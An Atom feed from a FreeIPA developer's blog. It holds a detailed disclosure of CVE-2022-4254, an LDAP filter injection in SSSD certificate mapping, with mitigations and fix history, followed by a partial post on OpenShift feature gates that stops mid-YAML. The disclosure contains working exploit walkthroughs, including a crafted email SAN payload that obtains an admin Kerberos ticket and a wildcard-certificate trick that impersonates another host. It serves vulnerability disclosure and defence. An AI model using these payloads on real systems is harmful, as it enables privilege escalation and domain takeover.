<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <title>Fraser's IdM Blog</title>
    <link href="https://frasertweedale.github.io/blog-redhat/atom.xml" rel="self" />
    <link href="https://frasertweedale.github.io/blog-redhat" />
    <id>https://frasertweedale.github.io/blog-redhat/atom.xml</id>
    <author>
        <name>Fraser Tweedale</name>
        
        <email>frase@frase.id.au</email>
        
    </author>
    <updated>2023-02-02T00:00:00Z</updated>
    <entry>
    <title>CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2023-02-02-freeipa-pkinit-certmap-vuln.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2023-02-02-freeipa-pkinit-certmap-vuln.html</id>
    <published>2023-02-02T00:00:00Z</published>
    <updated>2023-02-02T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="cve-2022-4254-freeipa-pkinit-certificate-mapping-vulnerability">CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability</h1>
<h2 id="executive-summary">Executive summary <a href="#executive-summary" class="section">§</a></h2>
<p><a href="https://www.freeipa.org/">FreeIPA</a> supports the Kerberos <em>PKINIT</em> protocol extension (<a href="https://datatracker.ietf.org/doc/html/rfc4556">RFC
4556</a>). PKINIT enables a client to authenticate to the KDC using
an X.509 certificate and the corresonding private key, rather than a
passphrase or keytab. FreeIPA uses <em>mapping rules</em> to map a
certificate presented during a PKINIT authentication request to the
corresponding principal. The mapping filter is vulnerable to LDAP
filter injection. The search result can be influenced by values in
the certificate, which may be attacker controlled. In the most
extreme case, an attacker could gain control of the <code>admin</code> account,
leading to full domain takeover.</p>
<p>FreeIPA is <strong>not vulnerable in its default configuration</strong>. To
exploit this bug requires:</p>
<ul>
<li>PKINIT is used in the environment, with certmap rules that are
susceptible to LDAP filter injection via data from the client’s
certificate; and</li>
<li>A client certificate used for PKINIT includes data that result in
the construction of an LDAP filter with a different meaning than
the administrator intended. This is unlikely in general, but some
use cases present a heightened risk, especially if the CA includes
(or can be induced to include) client-supplied or
attacker-controlled attributes in end-entity certificates.</li>
</ul>
<p>The issue was assigned <a href="https://access.redhat.com/security/cve/CVE-2022-4254">CVE-2022-4254</a>.</p>
<h3 id="affected-versions">Affected versions <a href="#affected-versions" class="section">§</a></h3>
<p>The problem is in <em>libsss_certmap</em>, which is part of <a href="https://sssd.io/">SSSD</a>.
FreeIPA servers use this library in <code>ipa_kdb</code> Kerberos plugin
implementation.</p>
<p>The issue was introduced in <a href="https://sssd.io/release-notes/sssd-1.15.3.html">SSSD 1.15.3</a> (when
<em>libsss_certmap</em> was introduced) and resolved in
<a href="https://sssd.io/release-notes/sssd-2.3.1.html">SSSD 2.3.1</a>.</p>
<p>All supported versions of RHEL 7 were affected (the fix was released
on the RHEL 7.9 bugfix stream). RHEL 8.0 up to 8.3 (inclusive) were
also affected (the fix was released to the still-supported streams).</p>
<p>RHEL 8.4 onwards and RHEL 9 are not affected. No supported versions
of Fedora are affected.</p>
<h3 id="timeline">Timeline <a href="#timeline" class="section">§</a></h3>
<ul>
<li><strong>2017-07-25</strong>: <em>libsss_certmap</em> was released with <a href="https://sssd.io/release-notes/sssd-1.15.3.html">SSSD 1.15.3</a>.</li>
<li><strong>2020-04-28</strong>: SSSD issue <a href="https://pagure.io/SSSD/sssd/issue/4180">pagure#4180</a> / <a href="https://github.com/SSSD/sssd/issues/5135">github#5135</a> was
created, reporting a lack of sanitisation of filter substitutions in
maprules.</li>
<li><strong>2020-07-24</strong>: The sanitisation issue was fixed upstream and <a href="https://sssd.io/release-notes/sssd-2.3.1.html">SSSD
2.3.1</a> is released, containing the fix.</li>
<li><strong>2022-11-16</strong>: While reviewing a feature involving the use of
PKINIT, I noticed that some versions of the <em>libsss_certmap</em> code
did not seem to sanitise certificate data used in LDAP filters. I
started to investigate.</li>
<li><strong>2022-11-17</strong>: I succeed in exploiting the behaviour, and began
internal discussions with Red Hat’s Platform Security
engineering team.</li>
<li><strong>2022-12-01</strong>: I sent my analysis to Red Hat’s Product Security
team. <a href="https://access.redhat.com/security/cve/CVE-2022-4254">CVE-2022-4254</a> was reserved for this issue on the same
day.</li>
<li><strong>2023-01-24</strong>: Planned release of fix to RHEL 7.9 <code>sssd</code> package,
in Batch Update 20. Details of the vulnerability were made public.</li>
</ul>
<h2 id="problem-description">Problem description <a href="#problem-description" class="section">§</a></h2>
<p>FreeIPA supports <em>certificate mapping rules</em> for mapping
certificates presented during PKINIT authentication to a Kerberos
principal. Certmap rules are stored in the LDAP database under
<code>cn=certmaprules,cn=certmap,{basedn}</code>. The <code>ipa_kdb</code> plugin uses
<em>libsss_certmap</em> to process certmap rules. An example rule object:</p>
<pre class="ldif"><code>dn: cn=certmap1,cn=certmaprules,cn=certmap,dc=ipa,dc=test
cn: certmap1
ipacertmapmaprule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
ipaenabledflag: TRUE
objectClass: ipacertmaprule
objectClass: top</code></pre>
<p>The <code>ipacertmaprule</code> attribute is a string representation of an LDAP
filter (<a href="https://datatracker.ietf.org/doc/html/rfc4515">RFC 4515</a>), with substitution templates in curly braces
(e.g. <code>{subject_dn}</code>). Template substitution is performed by the
<code>sss_certmap_get_search_filter</code> subroutine. The supported templates
are described in <code>sss_certmap(5)</code>. They include:</p>
<ul>
<li><code>{cert!base64}</code> (base64 encoding of whole certificate)</li>
<li><code>{issuer_dn}</code></li>
<li><code>{subject_dn}</code></li>
<li><code>{subject_rfc822_name}</code></li>
<li><code>{subject_dns_name}</code></li>
</ul>
<p>The KDC uses the resulting filter within a bigger search filter that
it uses to match the principal. The filter includes the requested
principal name from the Kerberos <em>authentication service request
(<code>AS_REQ</code>)</em>, and the maprule filter. The complete filter has the
following structure (wrapped for readability):</p>
<pre><code>(&amp;
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=REQUESTED_PRINCIPAL@REQUESTED_REALM)
    (krbPrincipalName:caseIgnoreIA5Match:=REQUESTED_PRINCPAL@REQUESTED_REALM)
  )
  MAPRULE_FILTER_GOES_HERE
)</code></pre>
<p>Note that the requested principal is <strong>specified by the client</strong> in
the Kerberos <code>AS_REQ</code>. This value <em>is properly escaped</em> where it is
inserted in the filter. But it is important to note that the client
can specify any principal the maprule filter fragment matches.</p>
<h3 id="sanitisation-not-performed">Sanitisation not performed <a href="#sanitisation-not-performed" class="section">§</a></h3>
<p>Some template substitutions are inherently safe, but some use values
from the certificate that could contain characters with special
meaning in LDAP filters. Of the substitutions listed above, only
<code>{cert!base64}</code> is safe. The others could contain special
characters (and there are still more that I did not list). Values
that could contain special characters have to be sanitised
(escaped). Specifically, the following characters must be replaced
with a <em>hex escape sequence</em>:</p>
<ul>
<li><code>NUL</code> → <code>\00</code></li>
<li><code>(</code> → <code>\28</code></li>
<li><code>)</code> → <code>\29</code></li>
<li><code>*</code> → <code>\2A</code></li>
<li><code>\</code> → <code>\5C</code></li>
</ul>
<p>The affected versions of SSSD do not perform this sanitisation. As
a consequence, the template substitutions can result in invalid
filters (resulting in authentication failure) or filters that match
the wrong principal entry (dangerous). The next two sections
demonstrate two different exploit scenarios.</p>
<div class="note">
<p>LDAP filter injection has been assigned <a href="https://cwe.mitre.org/data/definitions/90.html">CWE-90</a> in the <em>Common
Weakness Enumeration</em> database. Conceptually it is very similar to
SQL injection (<a href="https://cwe.mitre.org/data/definitions/89.html">CWE-89</a>).</p>
</div>
<h2 id="demo-1-attacker-supplied-rfc822name">Demo 1: Attacker-supplied <code>rfc822Name</code> <a href="#demo-1-attacker-supplied-rfc822name" class="section">§</a></h2>
<p>We will issue a certificate with an attacker-supplied <code>rfc822Name</code>
SAN value to an unprivileged user. The deployment has a plausible
certmap rule with a structure that can be exploited to obtain a TGT
for an attacker-specified user account, including highly privileged
accounts such as <code>admin</code>.</p>
<p>It is a fresh deployment running FreeIPA 4.6 on RHEL 7.9:</p>
<pre class="shell"><code># cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)

# rpm -qa |grep ipa-
ipa-client-4.6.8-5.el7.x86_64
sssd-ipa-1.16.5-10.el7.x86_64
ipa-server-4.6.8-5.el7.x86_64
ipa-common-4.6.8-5.el7.noarch
ipa-client-common-4.6.8-5.el7.noarch
ipa-server-common-4.6.8-5.el7.noarch</code></pre>
<h3 id="setup">Setup <a href="#setup" class="section">§</a></h3>
<p>Setup steps establish the user account, certmap rules, certificate
profiles and issuance policies required for the subsequent attack.
I perform these steps using the <code>admin</code> account:</p>
<pre><code># klist
Ticket cache: KEYRING:persistent:0:0
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:00:19  29/11/22 23:00:07  ldap/rhel78-0.ipa.test@IPA.TEST
28/11/22 23:00:09  29/11/22 23:00:07  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>Create the unprivileged user <code>alice</code>. She will be the subject
principal to whom the certificate will be issued.</p>
<pre class="shell"><code># ipa user-add alice --first Alice --last Able --password
Password: XXXXXXXX
Enter Password again to verify: XXXXXXXX
------------------
Added user &quot;alice&quot;
------------------
...</code></pre>
<p>Add a new <code>mail</code> attribute to <code>alice</code>’s LDAP entry. This will
enable us to issue a certificate from the internal CA that includes
the value as an <code>rfc822Name</code> Subject Alternative Name value.</p>
<pre class="shell"><code># echo &gt; mod.ldif &lt;&lt;EOF
dn: uid=alice,cn=users,cn=accounts,dc=ipa,dc=test
changetype: modify
add: mail
mail: &quot;bogus)(uid=admin)(cn=&quot;@ipa.test
EOF

# ldapmodify -Y GSSAPI &lt; mod.ldif
modifying entry &quot;uid=alice,cn=users,cn=accounts,dc=ipa,dc=test&quot;</code></pre>
<p>I had to add the new <code>mail</code> attribute via <code>ldapmodify</code> because the
email validation performed by the IPA API does not admit all valid
local-part values. But it is in fact a valid email address.</p>
<div class="note">
<p>The default access controls in FreeIPA do not allow non-admins to
modify <code>mail</code> attributes, even in their own entry. But I use this
approach because it is plausible for an organisation to have a
system that allows employees to request a specific mail alias.
Indeed we have such a system at Red Hat, although I don’t know if it
would allow such an exotic value.</p>
</div>
<p>Next, add a <em>CA ACL</em> rule that permits certificate to be issued to
user principals. For convenience we will use the included
<code>caIPAserviceCert</code> profile. Typical real world user certificate
scenarios would require a dedicated profile.</p>
<pre class="shell"><code># ipa caacl-add users_caIPAserviceCert --usercat=all
-------------------------------------
Added CA ACL &quot;users_caIPAserviceCert&quot;
-------------------------------------
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all

# ipa caacl-add-profile users_caIPAserviceCert --certprofile caIPAserviceCert
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all
  Profiles: caIPAserviceCert
-------------------------
Number of members added 1
-------------------------</code></pre>
<p>Finally add the certmap rule. It has a two-part <em>or-list</em> intended
to match the <code>rfc822Name</code> from the certificate to the <code>mail</code>
attribute, or else match the certificate subject DN to DN of the
LDAP entry:</p>
<pre class="shell"><code># ipa certmaprule-add certmap1 --maprule \
    &quot;(|(mail={subject_rfc822_name})(entryDN={subject_dn}))&quot;
--------------------------------------------------
Added Certificate Identity Mapping Rule &quot;certmap1&quot;
--------------------------------------------------
  Rule name: certmap1
  Mapping rule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
  Enabled: TRUE</code></pre>
<div class="note">
<p>The steps performed above are not part of the exploit itself, and
they require administrator privileges to perform. They are
presented as plausible configurations, the likes of which <em>may</em>
exist (or not) in a customer’s environment.</p>
</div>
<h3 id="exploit">Exploit <a href="#exploit" class="section">§</a></h3>
<p><code>alice</code> will request a certificate with the suspicious <code>rfc822Name</code>
and <strong>acquire a TGT for the <code>admin</code> user</strong>. First obtain a TGT for
<code>alice</code> (using password authentication):</p>
<pre class="shell"><code>$ kinit alice
Password for alice@IPA.TEST:</code></pre>
<p>Create a new keypair and certificate signing request (CSR). The
config causes the CSR to bear a SAN extension request containting
the malicious <code>rfc822Name</code>:</p>
<pre class="shell"><code>$ echo &gt; naughty.conf &lt;&lt;EOF
[ req ]
prompt = no
encrypt_key = no
distinguished_name = dn
req_extensions = exts
[ dn ]
commonName = &quot;alice&quot;
[ exts ]
subjectAltName=email:\&quot;bogus)(uid=admin)(cn=\&quot;@ipa.test
EOF

$ openssl req -new -config naughty.conf \
    -keyout naughty.key -out naughty.csr
Generating a 2048 bit RSA private key
..........+++
......................+++
writing new private key to &#39;naughty.key&#39;
-----</code></pre>
<p>Issue the certificate (this is a <em>self-service</em> certificate request,
which FreeIPA allows, subject to CA ACLs):</p>
<pre class="shell"><code>$ ipa cert-request naughty.csr \
    --principal alice naughty.csr \
    --certificate-out naughty.pem
  Issuing CA: ipa
  Certificate: MIIEPjCC...
  Subject: CN=alice,O=IPA.TEST 202211171708
  Subject email address: &quot;bogus)(uid=admin)(cn=&quot;@ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 04:42:58 2022 UTC
  Not After: Fri Nov 29 04:42:58 2024 UTC
  Serial number: 13
  Serial number (hex): 0xD</code></pre>
<p>Finally, use the new certificate and key to obtain a TGT <strong>for
<code>admin</code></strong>:</p>
<pre class="shell"><code>$ kinit -X X509_user_identity=FILE:naughty.pem,naughty.key admin

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:47:44  29/11/22 23:47:44  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>The exploit succeeds because the unescaped <code>rfc822Name</code> value
results in a filter that matches the <code>admin</code> user (formatted for
readability):</p>
<pre><code>(&amp;
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=admin@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=admin@IPA.TEST)
  )
  (|
    (mail=&quot;bogus)
    (uid=admin)
    (cn=&quot;@ipa.test)
    (entrydn=CN=alice,O=IPA.TEST 202211171708)
  )
)</code></pre>
<h2 id="demo-2-wildcard-dns-name">Demo 2: Wildcard DNS name <a href="#demo-2-wildcard-dns-name" class="section">§</a></h2>
<p>A wildcard certificate can be used to <strong>obtain a TGT for a different
host principal</strong>.</p>
<h3 id="setup-1">Setup <a href="#setup-1" class="section">§</a></h3>
<p>Add a profile for issuing wildcard certificates. I will skip the
details and instead refer to my <a href="https://frasertweedale.github.io/blog-redhat/posts/2017-06-26-freeipa-wildcard-san.html">blog post on this topic</a>.</p>
<p>Add a host called <code>ipa.test</code>, a <em>host group</em> called <code>webservers</code>,
and make <code>ipa.test</code> a member of <code>webservers</code>:</p>
<pre class="host"><code># ipa host-add ipa.test --force
----------------------
Added host &quot;ipa.test&quot;
----------------------
  Host name: ipa.test
  Principal name: host/ipa.test@IPA.TEST
  Principal alias: host/ipa.test@IPA.TEST
  Password: False
  Keytab: False
  Managed by: ipa.test

# ipa hostgroup-add webservers
----------------------------
Added hostgroup &quot;webservers&quot;
----------------------------
  Host-group: webservers

# ipa hostgroup-add-member webservers --hosts ipa.test
  Host-group: webservers
  Member hosts: ipa.test
-------------------------
Number of members added 1
-------------------------</code></pre>
<p>Add a <em>CA ACL</em> that allows <code>webservers</code> to be issued certificates
via the <code>wildcard</code> profile:</p>
<pre class="shell"><code># ipa caacl-add webservers_wildcard
----------------------------------
Added CA ACL &quot;webservers_wildcard&quot;
----------------------------------
  ACL name: webservers_wildcard
  Enabled: TRUE

# ipa caacl-add-host webservers_wildcard --hostgroup webservers
  ACL name: webservers_wildcard
  Enabled: TRUE
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------

# ipa caacl-add-profile webservers_wildcard --certprofile wildcard
  ACL name: webservers_wildcard
  Enabled: TRUE
  Profiles: wildcard
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------</code></pre>
<p>Finally, add a certmap rule that uses SAN <code>dNSName</code> values to locate
the principal:</p>
<pre class="shell"><code># ipa certmaprule-add certmap2 \
    --maprule &quot;(fqdn={subject_dns_name})&quot;
--------------------------------------------------
Added Certificate Identity Mapping Rule &quot;certmap2&quot;
--------------------------------------------------
  Rule name: certmap2
  Mapping rule: (fqdn={subject_dns_name})
  Enabled: TRUE</code></pre>
<h3 id="exploit-1">Exploit <a href="#exploit-1" class="section">§</a></h3>
<p>We will issue a wildcard certificate for <code>ipa.test</code>, and use it to
obtain a TGT for a different host. You could use <em>Certmonger</em> to
request the certificate, but I will interact directly with FreeIPA
via the <code>ipa</code> client program. The operator is the <code>host/ipa.test</code>
principal (I <code>kinit</code>ed using the host keytab):</p>
<pre class="shell"><code>$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 03:52:59  30/11/22 03:52:59  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>Create a keypair and CSR:</p>
<pre class="shell"><code>$ openssl req -new -subj &#39;/CN=ipa.test/&#39; -nodes \
    -keyout server.key -out server.csr
Generating a 2048 bit RSA private key
........................................................+++
.....................................................................................................................+++
writing new private key to &#39;server.key&#39;
-----</code></pre>
<p>Request the certificate, being sure to specify the <code>wildcard</code>
profile:</p>
<pre class="shell"><code>$ ipa cert-request server.csr \
    --principal host/ipa.test \
    --profile-id wildcard \
    --certificate-out server.pem
  Issuing CA: ipa
  Certificate: MIIENTCC...
  Subject: CN=ipa.test,O=IPA.TEST 202211171708
  Subject DNS name: ipa.test, *.ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 09:14:09 2022 UTC
  Not After: Fri Nov 29 09:14:09 2024 UTC
  Serial number: 16
  Serial number (hex): 0x10</code></pre>
<p>Finally, use the new certificate and key to obtain a TGT for a
<strong>different host</strong> whose <code>fqdn</code> attributes matches the LDAP
substring filter <code>(fqdn=*.ipa.test)</code>. In this example I acquire the
TGT for <strong><code>host/rhel78-0.ipa.test</code></strong> (one of the FreeIPA servers).</p>
<pre class="shell"><code>$ kinit -X X509_user_identity=FILE:server.pem,server.key \
    host/rhel78-0.ipa.test

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/rhel78-0.ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 04:15:52  30/11/22 04:15:52  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>The exploit succeeds because the unescaped wildcard <code>dNSName</code> value
results in a <strong><em>substring match</em></strong> filter (formatted for
readability):</p>
<pre><code>(&amp;
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=host/rhel78-0.ipa.test@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=host/rhel78-0.ipa.test@IPA.TEST)
  )
  (fqdn=*.ipa.test)
)</code></pre>
<p>The maprule filter matches any principal whose <code>fqdn</code> attribute ends
in <code>.ipa.test</code>. This sub-filter could match multiple principle
entries, but the <em>client-specified</em> principal name used in the
<code>krbPrincipalName</code> and <code>ipaKrbPricipalAlias</code> filters select the one
we want.</p>
<p>If there are multiple SAN values of the relevant type, the order is
important. The <em>last</em> value is used in the template substitution.
In my certificate, the last value is <code>*.ipa.test</code> so the exploit
succeeds. If the order was reversed, the exploit would not succeed.
This is an implementation detail of SSSD; it might as well have used
the first value but it just happened to be implemented this way.</p>
<h2 id="discussion">Discussion <a href="#discussion" class="section">§</a></h2>
<p>These exploits required a confluence of contributing factors to
succeed. Deployments using PKINIT with exact certificate matching
(the default) are also unaffected. The vulnerability only arises
when the customer uses certmap rules. None are defined by default.
Certmap rules (if they exist) are only <em>potentially</em> vulnerable;
several other factors have to come together.</p>
<p>The attacker must obtain a valid certificate from a trusted CA for a
key they control. Except in limited cases (e.g. wildcard DNS names)
the attacker must to be able to influence the attributes on the
certificate. Only <em>free-form</em> string attributes are potentially
problematic. These include DNS name, email address, SAN DN values,
principle names, and perhaps others. And there have to be SSSD
certmap rule template substitutions for the targeted attribute(s).</p>
<p>Next, there had to be a certmap rule that substitutes the
problematic value into the LDAP search filter. All filters that
substitute free-form attributes are susceptible to exploitation.
But in practice, <em>or-list</em> filters are <em>more susceptible</em> to
exploitation than <em>and-list</em> or single-clause filters. This is
because the attacker has more flexibility in how to make the filter
match the target account. But as we saw in the wildcard <code>dNSName</code>
example, even a single-clause filter fragment could be exploitable.</p>
<div class="note">
<p>The default ACIs allow any authenticated account to read certmap
rule entries. This may aid attackers in working out the attack
details.</p>
</div>
<p>Note that most <em>free-form</em> attributes have additional syntax rules
imposed upon them. For example, a SAN <code>dNSName</code> value should look
like a DNS name, and a SAN <code>rfc822Name</code> value should be a valid
email address. But the raw ASN.1 data does not guarantee this.
Even legal values can be problematic (as demonstrated). But if a
trusted CA can be induced to issue certificates that contain
<em>arbitrary</em> data in those free-form attributes, there is an even
greater risk of exploitation.</p>
<p>The use of the internal CA in this attack is incidental. The
administrator can configure FreeIPA to trust external CAs for
validating client PKINIT certificates. Any trusted CA can be used
in the attack, if the attacker can cause it to issue certificates
containing problematic values. Note that the KDC trusts the whole
system trust store, not just the trusted CAs from the FreeIPA CA
trust store. Certmap rules can be equipped with <em>matching rules</em> to
restrict which issuers are allowed for PKINIT certificate matching,
separate from CA trust for certification path verification purposes.</p>
<h2 id="mitigations">Mitigations <a href="#mitigations" class="section">§</a></h2>
<h3 id="use-exact-certificate-matching-do-not-use-certmap-rules">Use exact certificate matching / do not use certmap rules <a href="#use-exact-certificate-matching-do-not-use-certmap-rules" class="section">§</a></h3>
<p>PKINIT uses exact certificate matching by default. If feasible, you
can rely on that method and disable or delete any certmap rules.
<code>ipa certmaprule-find</code> lists all certmap rules that have been
defined. Use <code>ipa certmaprule-disable NAME</code> or <code>ipa certmaprule-del NAME</code> to disable or delete certmap rules, respectively.</p>
<p>The main drawback to this approach is that each principal’s entry
must have an up-to-date <code>userCertificate</code> attribute containing the
user’s certificate(s). This increases the size of entries, and may
have additional adminstrative overhead depending on how certificates
are issued and managed.</p>
<h3 id="audit-and-de-risk-certmap-rules">Audit and de-risk certmap rules <a href="#audit-and-de-risk-certmap-rules" class="section">§</a></h3>
<p>Non-santised parameter substitution in an LDAP filter <em>or-list</em> is
riskier than in <em>and-lists</em> lists or single . Replace certmap rules
containing <em>or</em> lists with multiple, separate certmap rules.</p>
<p>Ensure each rule is as specific as possible, and consider the
possibility of outlier or malicious values in the certificate when
designing certmap rules.</p>
<h3 id="review-ca-trust-profiles-and-validation">Review CA trust, profiles and validation <a href="#review-ca-trust-profiles-and-validation" class="section">§</a></h3>
<p>Review the kinds of data, especially user-supplied or user-writeable
data, that can be included on certificates issued by CAs that are
trusted for PKINIT purposes. Audit how those data are validated.</p>
<p>Review and limit which CAs are trusted for PKINIT to only those that
are necessary. If possible, consider using dedicated CAs for
issuing the client certificates used for PKINIT. Use the certmap
<em>matching rule</em> feature (not discussed here) to restrict the KDC to
only allow certificates issued by the PKINIT CAs.</p>
<h2 id="fix">Fix <a href="#fix" class="section">§</a></h2>
<p>Lack of sanitisation in certmap LDAP filter construction was
recognised as a bug in SSSD issue <a href="https://pagure.io/SSSD/sssd/issue/4180">pagure#4180</a> / <a href="https://github.com/SSSD/sssd/issues/5135">github#5135</a>.
The framing of the issue was that legitimate values in the
certificate were causing SSSD to construct invalid LDAP filters. It
appears that the security implications were not recognised or
discussed at that time.</p>
<p>SSSD commit <a href="https://github.com/SSSD/sssd/commit/a2b9a84460429181f2a4fa7e2bb5ab49fd561274">a2b9a84460429181f2a4fa7e2bb5ab49fd561274</a>
implemented the required sanitisation. <a href="https://sssd.io/release-notes/sssd-2.3.1.html">SSSD 2.3.1</a> was the first
release containing the fix. Commit
<a href="https://github.com/SSSD/sssd/commit/918fb32af6a271230bf87db47f78768edb9ca86c">918fb32af6a271230bf87db47f78768edb9ca86c</a> on
<strong>2022-01-06</strong> backported the fix to the <code>sssd-1.16</code> branch, but
there has not yet been a new release from this branch containing the
fix.</p>
<p>The SSSD team backported the fix to RHEL 7.9. It was included in
Batch Update 20 which was released on <strong>2022-01-24</strong>. Fixes to
extended support streams for RHEL 8.1 and 8.2 were also released on
that day, meaning that the issue is now fixed in all supported
versions of RHEL.</p>]]></summary>
</entry>
<entry>
    <title>Enabling Kubernetes feature gates in OpenShift</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2023-01-22-openshift-feature-gates.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2023-01-22-openshift-feature-gates.html</id>
    <published>2023-01-22T00:00:00Z</published>
    <updated>2023-01-22T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="enabling-kubernetes-feature-gates-in-openshift">Enabling Kubernetes feature gates in OpenShift</h1>
<p>When Kubernetes adds a feature or changes an existing one, the new
behaviour usually starts out hidden behind a <a href="https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/"><em>feature
gate</em></a>. Enhancements start off in the <em>Alpha</em>
stability class, where they are usually guarded by a feature gate
that is <strong>off by default</strong>. If the enhancement proves stable and
useful, after a few releases it will be promoted to <em>Beta</em>, and the
feature gate will typically default to <strong>on</strong>, though it can still
be disabled. The final stage of an enhancement is <em>GA (generally
available)</em>. If an enhancement reaches this stage, its feature gate
becomes non-operational and is <a href="https://kubernetes.io/docs/reference/using-api/deprecation-policy/">deprecated</a>, to be removed in a
later release.</p>
<p>So, in a real world deployment how do you enable or disable a
feature gate? There are several “distributions” of Kubernetes and
various ways of doing it. In this short post I’ll demonstrate how
to enable feature gates in <em>OpenShift</em>, Red Hat’s container
orchestration platform which is built on Kubernetes.</p>
<h2 id="the-featuregate-resource">The <code>FeatureGate</code> resource <a href="#the-featuregate-resource" class="section">§</a></h2>
<p>OpenShift recognises a <code>FeatureGate</code> resource type. A single,
resource of this type named <code>cluster</code> determines the feature gates
used across the cluster. A cluster administrator can modify
<code>FeatureGate/cluster</code> to vary the feature gates set in the cluster
from the defaults.</p>
<p>The <code>FeatureGate</code> resource is more than a mere list of feature gates
to enable or disable. First, in addition to Kubernetes feature
gates, it can also set feature gates for features in OpenShift
itself, or other components or products in the cluster. Second, it
can refer to named <em>feature sets</em>—groups of feature gates—as an
alternative to explicitly listing all the feature gates to enable or
disable.</p>
<p>For example, the <code>TechPreviewNoUpgrade</code> feature set enables a
collection of features that Red Hat have marked as useful and worthy
of customer <em>testing</em>, with a view to possible promotion to full
support in a future release. Customers do not need to enable
individual feature gates but can instead enable all the <em>Technology
Preview</em> features via the following <code>FeatureGate</code> spec:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> config.openshift.io/v1</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> FeatureGate</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> cluster</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">featureSet</span><span class="kw">:</span><span class="at"> TechPreviewNoUpgrade</span></span></code></pre></div>
<div class="note">
<p>Unlike the more general <code>MachineConfig</code> objects, <code>FeatureGate</code>
objects do not get composed together. Only the single object name
<code>cluster</code> is recognised. So there is no “lightweight” way to enable
all the feature gates from <code>TechPreviewNoUpgrade</code> plus one or two
additional feature gates. To accomplish that, use a
<code>CustomNoUpgrade</code> with <strong>all</strong> the desired feature gates listed.</p>
</div>
<h2 id="enabling-specific-feature-gates">Enabling specific feature gates <a href="#enabling-specific-feature-gates" class="section">§</a></h2>
<p>What if the <code>TechPreviewNoUpgrade</code> feature set does not include the
feature gate you want to enable? The <code>CustomNoUpgrade</code> feature set
allows you to list the specific feature gates you want to enable or
disable. The following exmaple enables the
<code>UserNamespaceStatelessPodsSupport</code> feature gate:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> config.openshift.io/v1</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> FeatureGate</span></span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> cluster</span></span>
<span id="cb2-5"><a href="#cb2-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb2-6"><a href="#cb2-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">featureSet</span><span class="kw">:</span><span class="at"> CustomNoUpgrade</span></span>
<span id="cb2-7"><a href="#cb2-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">customNoUpgrade</span><span class="kw">:</span></span>
